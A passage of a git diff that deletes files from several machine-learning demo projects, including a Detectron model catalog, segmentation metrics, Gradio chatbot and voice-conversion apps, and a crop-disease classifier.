"FAIR/X-152-32x8d-IN5k": "ImageNetPretrained/25093814/X-152-32x8d-IN5k.pkl", - } - - C2_DETECTRON_PATH_FORMAT = ( - "{prefix}/{url}/output/train/{dataset}/{type}/model_final.pkl" # noqa B950 - ) - - C2_DATASET_COCO = "coco_2014_train%3Acoco_2014_valminusminival" - C2_DATASET_COCO_KEYPOINTS = "keypoints_coco_2014_train%3Akeypoints_coco_2014_valminusminival" - - # format: {model_name} -> part of the url - C2_DETECTRON_MODELS = { - "35857197/e2e_faster_rcnn_R-50-C4_1x": "35857197/12_2017_baselines/e2e_faster_rcnn_R-50-C4_1x.yaml.01_33_49.iAX0mXvW", # noqa B950 - "35857345/e2e_faster_rcnn_R-50-FPN_1x": "35857345/12_2017_baselines/e2e_faster_rcnn_R-50-FPN_1x.yaml.01_36_30.cUF7QR7I", # noqa B950 - "35857890/e2e_faster_rcnn_R-101-FPN_1x": "35857890/12_2017_baselines/e2e_faster_rcnn_R-101-FPN_1x.yaml.01_38_50.sNxI7sX7", # noqa B950 - "36761737/e2e_faster_rcnn_X-101-32x8d-FPN_1x": "36761737/12_2017_baselines/e2e_faster_rcnn_X-101-32x8d-FPN_1x.yaml.06_31_39.5MIHi1fZ", # noqa B950 - "35858791/e2e_mask_rcnn_R-50-C4_1x": "35858791/12_2017_baselines/e2e_mask_rcnn_R-50-C4_1x.yaml.01_45_57.ZgkA7hPB", # noqa B950 - "35858933/e2e_mask_rcnn_R-50-FPN_1x": "35858933/12_2017_baselines/e2e_mask_rcnn_R-50-FPN_1x.yaml.01_48_14.DzEQe4wC", # noqa B950 - "35861795/e2e_mask_rcnn_R-101-FPN_1x": "35861795/12_2017_baselines/e2e_mask_rcnn_R-101-FPN_1x.yaml.02_31_37.KqyEK4tT", # noqa B950 - "36761843/e2e_mask_rcnn_X-101-32x8d-FPN_1x": "36761843/12_2017_baselines/e2e_mask_rcnn_X-101-32x8d-FPN_1x.yaml.06_35_59.RZotkLKI", # noqa B950 - "48616381/e2e_mask_rcnn_R-50-FPN_2x_gn": "GN/48616381/04_2018_gn_baselines/e2e_mask_rcnn_R-50-FPN_2x_gn_0416.13_23_38.bTlTI97Q", # noqa B950 - "37697547/e2e_keypoint_rcnn_R-50-FPN_1x": "37697547/12_2017_baselines/e2e_keypoint_rcnn_R-50-FPN_1x.yaml.08_42_54.kdzV35ao", # noqa B950 - "35998355/rpn_R-50-C4_1x": "35998355/12_2017_baselines/rpn_R-50-C4_1x.yaml.08_00_43.njH5oD9L", # noqa B950 - "35998814/rpn_R-50-FPN_1x": "35998814/12_2017_baselines/rpn_R-50-FPN_1x.yaml.08_06_03.Axg0r179", # noqa B950 - "36225147/fast_R-50-FPN_1x": "36225147/12_2017_baselines/fast_rcnn_R-50-FPN_1x.yaml.08_39_09.L3obSdQ2", # noqa B950 - } - - @staticmethod - def get(name): - if name.startswith("Caffe2Detectron/COCO"): - return ModelCatalog._get_c2_detectron_baseline(name) - if name.startswith("ImageNetPretrained/"): - return ModelCatalog._get_c2_imagenet_pretrained(name) - raise RuntimeError("model not present in the catalog: {}".format(name)) - - @staticmethod - def _get_c2_imagenet_pretrained(name): - prefix = ModelCatalog.S3_C2_DETECTRON_PREFIX - name = name[len("ImageNetPretrained/") :] - name = ModelCatalog.C2_IMAGENET_MODELS[name] - url = "/".join([prefix, name]) - return url - - @staticmethod - def _get_c2_detectron_baseline(name): - name = name[len("Caffe2Detectron/COCO/") :] - url = ModelCatalog.C2_DETECTRON_MODELS[name] - if "keypoint_rcnn" in name: - dataset = ModelCatalog.C2_DATASET_COCO_KEYPOINTS - else: - dataset = ModelCatalog.C2_DATASET_COCO - - if "35998355/rpn_R-50-C4_1x" in name: - # this one model is somehow different from others .. - type = "rpn" - else: - type = "generalized_rcnn" - - # Detectron C2 models are stored in the structure defined in `C2_DETECTRON_PATH_FORMAT`. - url = ModelCatalog.C2_DETECTRON_PATH_FORMAT.format( - prefix=ModelCatalog.S3_C2_DETECTRON_PREFIX, url=url, type=type, dataset=dataset - ) - return url - - -class ModelCatalogHandler(PathHandler): - """ - Resolve URL like catalog://. - """ - - PREFIX = "catalog://" - - def _get_supported_prefixes(self): - return [self.PREFIX] - - def _get_local_path(self, path, **kwargs): - logger = logging.getLogger(__name__) - catalog_path = ModelCatalog.get(path[len(self.PREFIX) :]) - logger.info("Catalog entry {} points to {}".format(path, catalog_path)) - return PathManager.get_local_path(catalog_path, **kwargs) - - def _open(self, path, mode="r", **kwargs): - return PathManager.open(self._get_local_path(path), mode, **kwargs) - - -PathManager.register_handler(ModelCatalogHandler()) diff --git a/spaces/YuDou/ChuanhuChatGPT/chatgpt - macOS.command b/spaces/YuDou/ChuanhuChatGPT/chatgpt - macOS.command deleted file mode 100644 index fa015edca9e6916f24394813ce8ba77d2072e296..0000000000000000000000000000000000000000 --- a/spaces/YuDou/ChuanhuChatGPT/chatgpt - macOS.command +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -echo Opening ChuanhuChatGPT... -cd "$(dirname "${BASH_SOURCE[0]}")" -nohup python3 ChuanhuChatbot.py >/dev/null 2>&1 & -sleep 5 -open http://127.0.0.1:7860 -echo Finished opening ChuanhuChatGPT (http://127.0.0.1:7860/). If you kill ChuanhuChatbot, Use "pkill -f 'ChuanhuChatbot'" command in terminal. \ No newline at end of file diff --git a/spaces/Yuliang/ECON/lib/pymafx/utils/data_loader.py b/spaces/Yuliang/ECON/lib/pymafx/utils/data_loader.py deleted file mode 100644 index 3d109f82b3473242a9fb9442037c47471fd0f7d2..0000000000000000000000000000000000000000 --- a/spaces/Yuliang/ECON/lib/pymafx/utils/data_loader.py +++ /dev/null @@ -1,78 +0,0 @@ -from __future__ import division - -import torch -from torch.utils.data import DataLoader -from torch.utils.data.sampler import Sampler - - -class RandomSampler(Sampler): - def __init__(self, data_source, checkpoint): - self.data_source = data_source - if checkpoint is not None and checkpoint['dataset_perm'] is not None: - self.dataset_perm = checkpoint['dataset_perm'] - self.perm = self.dataset_perm[checkpoint['batch_size'] * checkpoint['batch_idx']:] - else: - self.dataset_perm = torch.randperm(len(self.data_source)).tolist() - self.perm = torch.randperm(len(self.data_source)).tolist() - - def __iter__(self): - return iter(self.perm) - - def __len__(self): - return len(self.perm) - - -class SequentialSampler(Sampler): - def __init__(self, data_source, checkpoint): - self.data_source = data_source - if checkpoint is not None and checkpoint['dataset_perm'] is not None: - self.dataset_perm = checkpoint['dataset_perm'] - self.perm = self.dataset_perm[checkpoint['batch_size'] * checkpoint['batch_idx']:] - else: - self.dataset_perm = list(range(len(self.data_source))) - self.perm = self.dataset_perm - - def __iter__(self): - return iter(self.perm) - - def __len__(self): - return len(self.perm) - - -class CheckpointDataLoader(DataLoader): - """ - Extends torch.utils.data.DataLoader to handle resuming training from an arbitrary point within an epoch. - """ - def __init__( - self, - dataset, - checkpoint=None, - batch_size=1, - shuffle=False, - num_workers=0, - pin_memory=False, - drop_last=True, - timeout=0, - worker_init_fn=None - ): - - if shuffle: - sampler = RandomSampler(dataset, checkpoint) - else: - sampler = SequentialSampler(dataset, checkpoint) - if checkpoint is not None: - self.checkpoint_batch_idx = checkpoint['batch_idx'] - else: - self.checkpoint_batch_idx = 0 - - super(CheckpointDataLoader, self).__init__( - dataset, - sampler=sampler, - shuffle=False, - batch_size=batch_size, - num_workers=num_workers, - drop_last=drop_last, - pin_memory=pin_memory, - timeout=timeout, - worker_init_fn=None - ) diff --git a/spaces/ZJunTvT/ZJunChat/modules/overwrites.py b/spaces/ZJunTvT/ZJunChat/modules/overwrites.py deleted file mode 100644 index 035a4a52722d66ee28af1c05231ad1cea3339ef5..0000000000000000000000000000000000000000 --- a/spaces/ZJunTvT/ZJunChat/modules/overwrites.py +++ /dev/null @@ -1,94 +0,0 @@ -from __future__ import annotations -import logging - -from llama_index import Prompt -from typing import List, Tuple -import mdtex2html -from gradio_client import utils as client_utils - -from modules.presets import * -from modules.llama_func import * - - -def compact_text_chunks(self, prompt: Prompt, text_chunks: List[str]) -> List[str]: - logging.debug("Compacting text chunks...🚀🚀🚀") - combined_str = [c.strip() for c in text_chunks if c.strip()] - combined_str = [f"[{index+1}] {c}" for index, c in enumerate(combined_str)] - combined_str = "\n\n".join(combined_str) - # resplit based on self.max_chunk_overlap - text_splitter = self.get_text_splitter_given_prompt(prompt, 1, padding=1) - return text_splitter.split_text(combined_str) - - -def postprocess( - self, - y: List[List[str | Tuple[str] | Tuple[str, str] | None] | Tuple], - ) -> List[List[str | Dict | None]]: - """ - Parameters: - y: List of lists representing the message and response pairs. Each message and response should be a string, which may be in Markdown format. It can also be a tuple whose first element is a string filepath or URL to an image/video/audio, and second (optional) element is the alt text, in which case the media file is displayed. It can also be None, in which case that message is not displayed. - Returns: - List of lists representing the message and response. Each message and response will be a string of HTML, or a dictionary with media information. Or None if the message is not to be displayed. - """ - if y is None: - return [] - processed_messages = [] - for message_pair in y: - assert isinstance( - message_pair, (tuple, list) - ), f"Expected a list of lists or list of tuples. Received: {message_pair}" - assert ( - len(message_pair) == 2 - ), f"Expected a list of lists of length 2 or list of tuples of length 2. Received: {message_pair}" - - processed_messages.append( - [ - self._postprocess_chat_messages(message_pair[0], "user"), - self._postprocess_chat_messages(message_pair[1], "bot"), - ] - ) - return processed_messages - -def postprocess_chat_messages( - self, chat_message: str | Tuple | List | None, message_type: str - ) -> str | Dict | None: - if chat_message is None: - return None - elif isinstance(chat_message, (tuple, list)): - filepath = chat_message[0] - mime_type = client_utils.get_mimetype(filepath) - filepath = self.make_temp_copy_if_needed(filepath) - return { - "name": filepath, - "mime_type": mime_type, - "alt_text": chat_message[1] if len(chat_message) > 1 else None, - "data": None, # These last two fields are filled in by the frontend - "is_file": True, - } - elif isinstance(chat_message, str): - if message_type == "bot": - if not detect_converted_mark(chat_message): - chat_message = convert_mdtext(chat_message) - elif message_type == "user": - if not detect_converted_mark(chat_message): - chat_message = convert_asis(chat_message) - return chat_message - else: - raise ValueError(f"Invalid message for Chatbot component: {chat_message}") - -with open("./assets/custom.js", "r", encoding="utf-8") as f, open("./assets/Kelpy-Codos.js", "r", encoding="utf-8") as f2: - customJS = f.read() - kelpyCodos = f2.read() - -def reload_javascript(): - print("Reloading javascript...") - js = f'' - def template_response(*args, **kwargs): - res = GradioTemplateResponseOriginal(*args, **kwargs) - res.body = res.body.replace(b'', f'{js}'.encode("utf8")) - res.init_headers() - return res - - gr.routes.templates.TemplateResponse = template_response - -GradioTemplateResponseOriginal = gr.routes.templates.TemplateResponse \ No newline at end of file diff --git a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/core/evaluation/metrics.py b/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/core/evaluation/metrics.py deleted file mode 100644 index 16c7dd47cadd53cf1caaa194e28a343f2aacc599..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/core/evaluation/metrics.py +++ /dev/null @@ -1,326 +0,0 @@ -from collections import OrderedDict - -import annotator.uniformer.mmcv as mmcv -import numpy as np -import torch - - -def f_score(precision, recall, beta=1): - """calcuate the f-score value. - - Args: - precision (float | torch.Tensor): The precision value. - recall (float | torch.Tensor): The recall value. - beta (int): Determines the weight of recall in the combined score. - Default: False. - - Returns: - [torch.tensor]: The f-score value. - """ - score = (1 + beta**2) * (precision * recall) / ( - (beta**2 * precision) + recall) - return score - - -def intersect_and_union(pred_label, - label, - num_classes, - ignore_index, - label_map=dict(), - reduce_zero_label=False): - """Calculate intersection and Union. - - Args: - pred_label (ndarray | str): Prediction segmentation map - or predict result filename. - label (ndarray | str): Ground truth segmentation map - or label filename. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - label_map (dict): Mapping old labels to new labels. The parameter will - work only when label is str. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. The parameter will - work only when label is str. Default: False. - - Returns: - torch.Tensor: The intersection of prediction and ground truth - histogram on all classes. - torch.Tensor: The union of prediction and ground truth histogram on - all classes. - torch.Tensor: The prediction histogram on all classes. - torch.Tensor: The ground truth histogram on all classes. - """ - - if isinstance(pred_label, str): - pred_label = torch.from_numpy(np.load(pred_label)) - else: - pred_label = torch.from_numpy((pred_label)) - - if isinstance(label, str): - label = torch.from_numpy( - mmcv.imread(label, flag='unchanged', backend='pillow')) - else: - label = torch.from_numpy(label) - - if label_map is not None: - for old_id, new_id in label_map.items(): - label[label == old_id] = new_id - if reduce_zero_label: - label[label == 0] = 255 - label = label - 1 - label[label == 254] = 255 - - mask = (label != ignore_index) - pred_label = pred_label[mask] - label = label[mask] - - intersect = pred_label[pred_label == label] - area_intersect = torch.histc( - intersect.float(), bins=(num_classes), min=0, max=num_classes - 1) - area_pred_label = torch.histc( - pred_label.float(), bins=(num_classes), min=0, max=num_classes - 1) - area_label = torch.histc( - label.float(), bins=(num_classes), min=0, max=num_classes - 1) - area_union = area_pred_label + area_label - area_intersect - return area_intersect, area_union, area_pred_label, area_label - - -def total_intersect_and_union(results, - gt_seg_maps, - num_classes, - ignore_index, - label_map=dict(), - reduce_zero_label=False): - """Calculate Total Intersection and Union. - - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - - Returns: - ndarray: The intersection of prediction and ground truth histogram - on all classes. - ndarray: The union of prediction and ground truth histogram on all - classes. - ndarray: The prediction histogram on all classes. - ndarray: The ground truth histogram on all classes. - """ - num_imgs = len(results) - assert len(gt_seg_maps) == num_imgs - total_area_intersect = torch.zeros((num_classes, ), dtype=torch.float64) - total_area_union = torch.zeros((num_classes, ), dtype=torch.float64) - total_area_pred_label = torch.zeros((num_classes, ), dtype=torch.float64) - total_area_label = torch.zeros((num_classes, ), dtype=torch.float64) - for i in range(num_imgs): - area_intersect, area_union, area_pred_label, area_label = \ - intersect_and_union( - results[i], gt_seg_maps[i], num_classes, ignore_index, - label_map, reduce_zero_label) - total_area_intersect += area_intersect - total_area_union += area_union - total_area_pred_label += area_pred_label - total_area_label += area_label - return total_area_intersect, total_area_union, total_area_pred_label, \ - total_area_label - - -def mean_iou(results, - gt_seg_maps, - num_classes, - ignore_index, - nan_to_num=None, - label_map=dict(), - reduce_zero_label=False): - """Calculate Mean Intersection and Union (mIoU) - - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - nan_to_num (int, optional): If specified, NaN values will be replaced - by the numbers defined by the user. Default: None. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - - Returns: - dict[str, float | ndarray]: - float: Overall accuracy on all images. - ndarray: Per category accuracy, shape (num_classes, ). - ndarray: Per category IoU, shape (num_classes, ). - """ - iou_result = eval_metrics( - results=results, - gt_seg_maps=gt_seg_maps, - num_classes=num_classes, - ignore_index=ignore_index, - metrics=['mIoU'], - nan_to_num=nan_to_num, - label_map=label_map, - reduce_zero_label=reduce_zero_label) - return iou_result - - -def mean_dice(results, - gt_seg_maps, - num_classes, - ignore_index, - nan_to_num=None, - label_map=dict(), - reduce_zero_label=False): - """Calculate Mean Dice (mDice) - - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - nan_to_num (int, optional): If specified, NaN values will be replaced - by the numbers defined by the user. Default: None. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - - Returns: - dict[str, float | ndarray]: Default metrics. - float: Overall accuracy on all images. - ndarray: Per category accuracy, shape (num_classes, ). - ndarray: Per category dice, shape (num_classes, ). - """ - - dice_result = eval_metrics( - results=results, - gt_seg_maps=gt_seg_maps, - num_classes=num_classes, - ignore_index=ignore_index, - metrics=['mDice'], - nan_to_num=nan_to_num, - label_map=label_map, - reduce_zero_label=reduce_zero_label) - return dice_result - - -def mean_fscore(results, - gt_seg_maps, - num_classes, - ignore_index, - nan_to_num=None, - label_map=dict(), - reduce_zero_label=False, - beta=1): - """Calculate Mean Intersection and Union (mIoU) - - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - nan_to_num (int, optional): If specified, NaN values will be replaced - by the numbers defined by the user. Default: None. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - beta (int): Determines the weight of recall in the combined score. - Default: False. - - - Returns: - dict[str, float | ndarray]: Default metrics. - float: Overall accuracy on all images. - ndarray: Per category recall, shape (num_classes, ). - ndarray: Per category precision, shape (num_classes, ). - ndarray: Per category f-score, shape (num_classes, ). - """ - fscore_result = eval_metrics( - results=results, - gt_seg_maps=gt_seg_maps, - num_classes=num_classes, - ignore_index=ignore_index, - metrics=['mFscore'], - nan_to_num=nan_to_num, - label_map=label_map, - reduce_zero_label=reduce_zero_label, - beta=beta) - return fscore_result - - -def eval_metrics(results, - gt_seg_maps, - num_classes, - ignore_index, - metrics=['mIoU'], - nan_to_num=None, - label_map=dict(), - reduce_zero_label=False, - beta=1): - """Calculate evaluation metrics - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - metrics (list[str] | str): Metrics to be evaluated, 'mIoU' and 'mDice'. - nan_to_num (int, optional): If specified, NaN values will be replaced - by the numbers defined by the user. Default: None. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - Returns: - float: Overall accuracy on all images. - ndarray: Per category accuracy, shape (num_classes, ). - ndarray: Per category evaluation metrics, shape (num_classes, ). - """ - if isinstance(metrics, str): - metrics = [metrics] - allowed_metrics = ['mIoU', 'mDice', 'mFscore'] - if not set(metrics).issubset(set(allowed_metrics)): - raise KeyError('metrics {} is not supported'.format(metrics)) - - total_area_intersect, total_area_union, total_area_pred_label, \ - total_area_label = total_intersect_and_union( - results, gt_seg_maps, num_classes, ignore_index, label_map, - reduce_zero_label) - all_acc = total_area_intersect.sum() / total_area_label.sum() - ret_metrics = OrderedDict({'aAcc': all_acc}) - for metric in metrics: - if metric == 'mIoU': - iou = total_area_intersect / total_area_union - acc = total_area_intersect / total_area_label - ret_metrics['IoU'] = iou - ret_metrics['Acc'] = acc - elif metric == 'mDice': - dice = 2 * total_area_intersect / ( - total_area_pred_label + total_area_label) - acc = total_area_intersect / total_area_label - ret_metrics['Dice'] = dice - ret_metrics['Acc'] = acc - elif metric == 'mFscore': - precision = total_area_intersect / total_area_pred_label - recall = total_area_intersect / total_area_label - f_value = torch.tensor( - [f_score(x[0], x[1], beta) for x in zip(precision, recall)]) - ret_metrics['Fscore'] = f_value - ret_metrics['Precision'] = precision - ret_metrics['Recall'] = recall - - ret_metrics = { - metric: value.numpy() - for metric, value in ret_metrics.items() - } - if nan_to_num is not None: - ret_metrics = OrderedDict({ - metric: np.nan_to_num(metric_value, nan=nan_to_num) - for metric, metric_value in ret_metrics.items() - }) - return ret_metrics diff --git a/spaces/abionchito/rvc-models/app.py b/spaces/abionchito/rvc-models/app.py deleted file mode 100644 index 8f1dd8103616f47920fdd5a43d91e847250a3833..0000000000000000000000000000000000000000 --- a/spaces/abionchito/rvc-models/app.py +++ /dev/null @@ -1,188 +0,0 @@ -import os -import json -import argparse -import traceback -import logging -import gradio as gr -import numpy as np -import librosa -import torch -import asyncio -import edge_tts -from datetime import datetime -from fairseq import checkpoint_utils -from infer_pack.models import SynthesizerTrnMs256NSFsid, SynthesizerTrnMs256NSFsid_nono -from vc_infer_pipeline import VC -from config import ( - is_half, - device -) -logging.getLogger("numba").setLevel(logging.WARNING) -limitation = os.getenv("SYSTEM") == "spaces" # limit audio length in huggingface spaces - -def create_vc_fn(tgt_sr, net_g, vc, if_f0, file_index, file_big_npy): - def vc_fn( - input_audio, - f0_up_key, - f0_method, - index_rate, - tts_mode, - tts_text, - tts_voice - ): - try: - if tts_mode: - if len(tts_text) > 100 and limitation: - return "Text is too long", None - if tts_text is None or tts_voice is None: - return "You need to enter text and select a voice", None - asyncio.run(edge_tts.Communicate(tts_text, "-".join(tts_voice.split('-')[:-1])).save("tts.mp3")) - audio, sr = librosa.load("tts.mp3", sr=16000, mono=True) - else: - if args.files: - audio, sr = librosa.load(input_audio, sr=16000, mono=True) - else: - if input_audio is None: - return "You need to upload an audio", None - sampling_rate, audio = input_audio - duration = audio.shape[0] / sampling_rate - if duration > 20 and limitation: - return "Please upload an audio file that is less than 20 seconds. If you need to generate a longer audio file, please use Colab.", None - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - times = [0, 0, 0] - f0_up_key = int(f0_up_key) - audio_opt = vc.pipeline( - hubert_model, - net_g, - 0, - audio, - times, - f0_up_key, - f0_method, - file_index, - file_big_npy, - index_rate, - if_f0, - ) - print( - f"[{datetime.now().strftime('%Y-%m-%d %H:%M')}]: npy: {times[0]}, f0: {times[1]}s, infer: {times[2]}s" - ) - return "Success", (tgt_sr, audio_opt) - except: - info = traceback.format_exc() - print(info) - return info, (None, None) - return vc_fn - -def load_hubert(): - global hubert_model - models, _, _ = checkpoint_utils.load_model_ensemble_and_task( - ["hubert_base.pt"], - suffix="", - ) - hubert_model = models[0] - hubert_model = hubert_model.to(device) - if is_half: - hubert_model = hubert_model.half() - else: - hubert_model = hubert_model.float() - hubert_model.eval() - -def change_to_tts_mode(tts_mode): - if tts_mode: - return gr.Audio.update(visible=False), gr.Textbox.update(visible=True), gr.Dropdown.update(visible=True) - else: - return gr.Audio.update(visible=True), gr.Textbox.update(visible=False), gr.Dropdown.update(visible=False) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--api', action="store_true", default=False) - parser.add_argument("--share", action="store_true", default=False, help="share gradio app") - parser.add_argument("--files", action="store_true", default=False, help="load audio from path") - args, unknown = parser.parse_known_args() - load_hubert() - models = [] - tts_voice_list = asyncio.get_event_loop().run_until_complete(edge_tts.list_voices()) - voices = [f"{v['ShortName']}-{v['Gender']}" for v in tts_voice_list] - with open("weights/model_info.json", "r", encoding="utf-8") as f: - models_info = json.load(f) - for name, info in models_info.items(): - if not info['enable']: - continue - title = info['title'] - author = info.get("author", None) - cover = f"weights/{name}/{info['cover']}" - index = f"weights/{name}/{info['feature_retrieval_library']}" - npy = f"weights/{name}/{info['feature_file']}" - cpt = torch.load(f"weights/{name}/{name}.pth", map_location="cpu") - tgt_sr = cpt["config"][-1] - cpt["config"][-3] = cpt["weight"]["emb_g.weight"].shape[0] # n_spk - if_f0 = cpt.get("f0", 1) - if if_f0 == 1: - net_g = SynthesizerTrnMs256NSFsid(*cpt["config"], is_half=is_half) - else: - net_g = SynthesizerTrnMs256NSFsid_nono(*cpt["config"]) - del net_g.enc_q - print(net_g.load_state_dict(cpt["weight"], strict=False)) # 不加这一行清不干净, 真奇葩 - net_g.eval().to(device) - if is_half: - net_g = net_g.half() - else: - net_g = net_g.float() - vc = VC(tgt_sr, device, is_half) - models.append((name, title, author, cover, create_vc_fn(tgt_sr, net_g, vc, if_f0, index, npy))) - with gr.Blocks() as app: - gr.Markdown( - "#
    RVC Models (Outdated)\n" - "##
    The input audio should be clean and pure voice without background music.\n" - "###
    Updated Repository: [NEW RVC Models](https://huggingface.co/spaces/ArkanDash/rvc-models-new).\n" - "####
    Recommended to use the Google Colab version for more feature.\n" - "![visitor badge](https://visitor-badge.glitch.me/badge?page_id=ArkanDash.Rvc-Models)\n\n" - "[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1hx6kKvIuv5XNY1Gai2PEuZhpO5z6xpVh?usp=sharing)\n\n" - "[![Original Repo](https://badgen.net/badge/icon/github?icon=github&label=Original%20Repo)](https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI)" - ) - with gr.Tabs(): - for (name, title, author, cover, vc_fn) in models: - with gr.TabItem(name): - with gr.Row(): - gr.Markdown( - '
    ' - f'
    {title}
    \n'+ - (f'
    Model author: {author}
    ' if author else "")+ - (f'' if cover else "")+ - '
    ' - ) - with gr.Row(): - with gr.Column(): - if args.files: - vc_input = gr.Textbox(label="Input audio path") - else: - vc_input = gr.Audio(label="Input audio"+' (less than 20 seconds)' if limitation else '') - vc_transpose = gr.Number(label="Transpose", value=0) - vc_f0method = gr.Radio( - label="Pitch extraction algorithm, PM is fast but Harvest is better for low frequencies", - choices=["pm", "harvest"], - value="pm", - interactive=True, - ) - vc_index_ratio = gr.Slider( - minimum=0, - maximum=1, - label="Retrieval feature ratio", - value=0.6, - interactive=True, - ) - tts_mode = gr.Checkbox(label="tts (use edge-tts as input)", value=False) - tts_text = gr.Textbox(visible=False,label="TTS text (100 words limitation)" if limitation else "TTS text") - tts_voice = gr.Dropdown(label="Edge-tts speaker", choices=voices, visible=False, allow_custom_value=False, value="en-US-AnaNeural-Female") - vc_submit = gr.Button("Generate", variant="primary") - with gr.Column(): - vc_output1 = gr.Textbox(label="Output Message") - vc_output2 = gr.Audio(label="Output Audio") - vc_submit.click(vc_fn, [vc_input, vc_transpose, vc_f0method, vc_index_ratio, tts_mode, tts_text, tts_voice], [vc_output1, vc_output2]) - tts_mode.change(change_to_tts_mode, [tts_mode], [vc_input, tts_text, tts_voice]) - app.queue(concurrency_count=1, max_size=20, api_open=args.api).launch(share=args.share) \ No newline at end of file diff --git a/spaces/adityapathakk/crop-health/app.py b/spaces/adityapathakk/crop-health/app.py deleted file mode 100644 index 73c1d37e15047ecbdab2d4c6bc84c1588185e3ae..0000000000000000000000000000000000000000 --- a/spaces/adityapathakk/crop-health/app.py +++ /dev/null @@ -1,75 +0,0 @@ -import os -import copy -import torch -import gradio -import gradio as gr -from PIL import Image -import torch.nn as nn -from torchvision import transforms, models -device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') - -os.system("wget https://www.dropbox.com/s/3us120bz5lhoh0t/model_best.pt?dl=0") - -model = models.resnet50(pretrained=True) -num_ftrs = model.fc.in_features -# Here the size of each output sample is set to 2. -# Alternatively, it can be generalized to nn.Linear(num_ftrs, len(class_names)). -model.fc = nn.Linear(num_ftrs, 7) - -model.load_state_dict(torch.load("./model_best.pt?dl=0", map_location=device)) - -# img = Image.open(path).convert('RGB') -# from torchvision import transforms - -transforms2 = transforms.Compose([ - transforms.Resize(224), - transforms.ToTensor(), - transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) - ]) - -# img = transforms(img) -# img = img.unsqueeze(0) -model.eval() - -labels = ["Bacterialblight", -"Blast", -"Brownspot", -"Healthy", -"Hispa", -"LeafBlast", -"Tungro"] -# with torch.no_grad(): -# # preds = -# preds = model(img) -# score, indices = torch.max(preds, 1) - -def recognize_digit(image): - image = transforms2(image) - image = image.unsqueeze(0) - # image = image.unsqueeze(0) - # image = image.reshape(1, -1) - # with torch.no_grad(): - # preds = - # img = image.reshape((-1, 3, 256, 256)) - preds = model(image).flatten() - # prediction = model.predict(image).tolist()[0] - # score, indices = torch.max(preds, 1) - # return {str(indices.item())} - return {labels[i]: float(preds[i]) for i in range(7)} - - -im = gradio.inputs.Image( - shape=(224, 224), image_mode="RGB", type="pil") - -iface = gr.Interface( - recognize_digit, - im, - gradio.outputs.Label(num_top_classes=3), - live=True, - #interpretation="default", - # examples=[["images/cheetah1.jpg"], ["images/lion.jpg"]], - capture_session=True, -) - -iface.test_launch() -iface.launch() \ No newline at end of file diff --git a/spaces/akhaliq/SummerTime/model/multi_doc/base_multi_doc_model.py b/spaces/akhaliq/SummerTime/model/multi_doc/base_multi_doc_model.py deleted file mode 100644 index 4fd304350cc6fef91acb348bcd8dfc03a8f039e9..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/SummerTime/model/multi_doc/base_multi_doc_model.py +++ /dev/null @@ -1,40 +0,0 @@ -from model.base_model import SummModel - - -class MultiDocSummModel(SummModel): - - is_multi_document = True - - def __init__( - self, - trained_domain: str = None, - max_input_length: int = None, - max_output_length: int = None, - ): - super(MultiDocSummModel, self).__init__( - trained_domain=trained_domain, - max_input_length=max_input_length, - max_output_length=max_output_length, - ) - - @classmethod - def assert_summ_input_type(cls, corpus, query): - if not all( - [ - isinstance(ins, list) and all([isinstance(doc, str) for doc in ins]) - for ins in corpus - ] - ): - raise TypeError( - "Multi-document summarization models summarize instances of multiple documents (`List[List[str]]`)." - ) - - if query is not None: - if not isinstance(query, list): - raise TypeError( - "Query-based single-document summarization requires query of `List[str]`." - ) - if not all([isinstance(q, str) for q in query]): - raise TypeError( - "Query-based single-document summarization requires query of `List[str]`." - ) diff --git a/spaces/akhaliq/SummerTime/tests/dataset_test.py b/spaces/akhaliq/SummerTime/tests/dataset_test.py deleted file mode 100644 index 8f519512c3792d7b2dc86891fdbd303fb77ccdd9..0000000000000000000000000000000000000000 --- 